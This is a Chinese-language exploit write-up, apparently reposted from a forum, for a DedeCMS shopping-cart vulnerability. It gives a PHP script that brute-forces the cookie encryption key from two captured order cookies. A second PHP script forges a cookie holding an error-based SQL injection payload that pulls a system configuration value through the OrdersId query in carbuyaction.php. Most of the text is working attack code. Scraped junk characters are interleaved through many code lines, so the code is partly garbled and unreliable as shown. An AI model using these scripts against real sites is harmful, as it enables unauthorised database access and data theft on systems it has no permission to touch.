织梦CMS漏洞dedecms漏洞SQL注入漏洞

admin

www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php中
先看一下这个shopcar类是如何生成cookie的
239      function saveCookie($key,$value)
240      {
241          if(is_array($value))
+ C) E8 [9 T4 q( ?3 K& ]242          {
7 a9 u6 i) f6 l1 c9 i243              $value = $this->enCrypt($this->enCode($value));
9 t7 d$ r* g7 ~/ [) G9 Y1 J244          }
245          else
# ^" ?9 A) h# e5 [* D# d" d246          {
247              $value = $this->enCrypt($value);
: }: t* Z+ S  F3 r- Z1 j% h, l248          }
/ x2 O2 g3 X4 Z& M" m3 @+ u# x3 F% P5 M249          setcookie($key,$value,time()+36000,’/');
8 z. b* O( k. N- R  u4 D2 P; o0 a250      }
简单的说，$key就是cookie的key，value就是value，enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型，关键是enCrypt函数
186      function enCrypt($txt)
+ c4 X3 d! o5 q, \  }# F; d% C6 u187      {
188          srand((double)microtime() * 1000000);
) M8 j# p+ H% e; r# r- ~9 e189          $encrypt_key = md5(rand(0, 32000));
7 [3 D/ H& a: ?% H# L8 @190          $ctr = 0;
8 M4 k& T0 a1 M( x9 B. t, D191          $tmp = ”;
% C; \2 v% @* y1 z192          for($i = 0; $i < strlen($txt); $i++)
193          {
194              $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
: H) r2 h9 f. g195              $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
, k4 k1 K0 r6 J; K3 ?196          }
% F) R# L9 D9 t& C197          return base64_encode($this->setKey($tmp));
% d8 o' j/ d1 i& F: B8 M1 C, F198      }
213      function setKey($txt)
: X# }( D0 E! V214      {
215          global $cfg_cookie_encode;
216          $encrypt_key = md5(strtolower($cfg_cookie_encode));
217          $ctr = 0;
& p4 z; G) f# z1 j8 \0 ^218          $tmp = ”;
219          for($i = 0; $i < strlen($txt); $i++)
* ~+ U; ~1 }- u220          {
221              $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
7 e8 L. z+ Z* K  J222              $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
223          }
224          return $tmp;
225      }
enCrypt的参数$txt 我们是可知的，返回值就是cookie的值，这个我们也是可知的
然后到了enCrypt调用 setKey时的参数$tmp，这个参数在某种意义上，我们也是可知的，因为$encrypt_key = md5(rand(0, 32000));只有32000种可能，我们可以推出32000种可能的$tmp，从而推出32000种可能的md5(strtolower($cfg_cookie_encode))，对了，忘记说了，我们的目的是推测出setKey中$encrypt_key的值，然后才能任意构造出购物车的cookie，从推出的32000种md5(strtolower($cfg_cookie_encode))，简单过滤掉非字母数字的key，就只剩下几百个可能的key，然后我们再从新下一次订单，然后再获取几百个可能的key，然后取交集，得到最终key。
! G9 x* P$ \- D: b0 P具体代码如下：
<?php
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
. l- ?" _1 P& M5 @1 Y$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
7 N% g' |) a) p' ]; ^$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
function reStrCode($code,$string)
3 d; R' r( k" `7 O{
5 P) n% ]; ]" a. s9 t+ r4 g$code = base64_decode($code);
. ]( g7 i* s3 Q: K$key = “”;
9 a  }* P% N) Nfor($i=0 ; $i<32 ; $i++)
/ y. O) v7 q* _0 Y1 \* G{
# s( `  S  x$ |2 S! _" p$key .= $string[$i] ^ $code[$i];
}
1 y, s8 I) D/ G% S; U! e' G3 B- Vreturn $key;
4 Q& y. v: ?8 J) ]0 p) X4 d}
function getKeys($cookie,$plantxt)
' g4 W; m1 v" t% x{
5 D- e0 Y% D  n! @- r$tmp = $cookie;
' d2 J! G# M7 m! z( }6 I+ E( d$results = array();
7 J, p  f1 D& F5 Ufor($j=0 ; $j < 32000; $j++)
{
: D3 R! n4 w  j, f2 u
0 I# G0 `1 W2 y) s$txt = $plantxt;
$ctr = 0;
' Y- p. B7 o; I6 S$ v- l. t$tmp = ”;
7 `5 _7 i9 J. S0 B7 r& m$encrypt_key = md5($j);
for($i =0; $i < strlen($txt); $i ++)
9 n8 V* A) x! p; @{
' |+ w9 m& J3 D6 A7 U+ J$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
- j6 c& i: R, V$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
  E9 o& U% R" e$ W; k}
$string = $tmp;
$code = $cookie;
$result = reStrCode($code,$string);
+ z- }1 E8 w/ s/ eif(eregi(‘^[a-z0-9]+$’,$result))
{
echo $result.”\n”;
$results[] = $result;
}
+ A; g1 S- S* L/ l! G  q8 ?$ v  G}
return $results;
}
$results1 = getKeys($cookie1,$plantxt);
$results2 = getKeys($cookie2,$plantxt);
. P; N; o( O* j( cprint “\n——————–real key————————–\n”;
) A- y, X# o+ t3 }9 @8 Q9 pforeach($results1 as $test1)
{
% b9 \* B  r, o2 T& f5 F1 ^foreach($results2 as $test2)
+ E# ^) W9 k% S( z: J! B{
if($test1 == $test2)
' K1 }# f7 G* m5 S: H! U{
echo $test1.”\n”;
}
}
- q4 x7 w0 v- p5 v8 h}
& A  |4 K* P, O7 |7 L  J7 o; Q?>
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie，
. i( G' _6 ?8 v5 g& kplantxt可以根据页面来自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
4 [8 i" Y" X& y0 A然后推算出md5(strtolower($cfg_cookie_encode))
得到这个key之后，我们就可以构造任意购物车的cookie
1 O6 E% @3 s/ @3 o( v接着看
. p1 e2 {) {: |20  class MemberShops
21  {
* h( r2 Q( v0 D3 ~) \% i3 X1 ]0 }22      var $OrdersId;
* t5 V1 b' O6 C2 ]: x23      var $productsId;
24
& y2 b: |3 ~0 _4 C25      function __construct()
26      {
+ z9 U" R5 L' ~0 U0 R* `$ t; I27          $this->OrdersId = $this->getCookie(“OrdersId”);
28          if(empty($this->OrdersId))
29          {
* F' U1 u* F; t$ Z1 N9 U30              $this->OrdersId = $this->MakeOrders();
+ }& B' I4 |# u31          }
7 T# X" {# f8 k0 T$ A# Z32      }
2 R  m' h1 g3 ~! t发现OrderId是从cookie里面获取的
然后
/plus/carbuyaction.php中的
29      $cart    = new MemberShops();
3 g2 V$ ]: o# W, i39      $OrdersId = $cart->OrdersId;        //本次记录的订单号
" S3 O4 n' Q! t2 k# _- X……
$ Z* |/ @& O5 Y* d$ x: z173          $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
, t3 h( I$ a% [- F$ S; C' o2 W, G接着我们就可以注入了
9 V7 {" W' `0 Q7 f: `通过利用下面代码生成cookie：
<?php
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″;   // here is the key, please change here
function setKey($txt)
" r2 Q' m# o: u{
4 j$ W3 ]1 h& T# K! m9 Qglobal $encrypt_key;
7 K* [( C- B* o1 `; {( R9 F$ctr = 0;
$tmp = ”;
7 h; `5 }4 A4 r- ]for($i = 0; $i < strlen($txt); $i++)
{
" m; O- _; O5 {, @% B  I$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
. M& ]: G4 L( ^# ?( `! V) f+ D}
6 {6 F) }$ k% y) B+ _$ W* p8 Greturn $tmp;
}
2 t! K) g" Q1 r9 Z( Q5 B. |function enCrypt($txt)
{
3 v& D( n6 F: S2 G. |4 ~srand((double)microtime() * 1000000);
5 w1 C; _1 y' B0 I$encrypt_key = md5(rand(0, 32000));
, L. P0 T; Z2 }/ V% z$ctr = 0;
$tmp = ”;
for($i = 0; $i < strlen($txt); $i++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
  M' s; i1 O1 z$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
* V* v3 w+ |+ ~; t}
5 r2 h( D; y8 p! ?  preturn base64_encode(setKey($tmp));
}
for($dest =0;$dest = enCrypt($txt);)
{
5 z5 r3 |& U9 W$ ^if(!strpos($dest,’+'))
6 e* M- n6 D2 Q) `; Z{
6 U/ i" ~' P2 o4 j! Z! {* L3 }% Sbreak;
* J/ K4 W* p9 l( s  r- Q/ n: M}
}
% N9 P% Q5 H1 ~5 a& ?( S& e; Pecho $dest.”\n”;
+ h9 f, _7 b. A1 z- Q3 ~?>
( _( }( b' d. W, p( M
+ H% v. L4 z! A/ Q​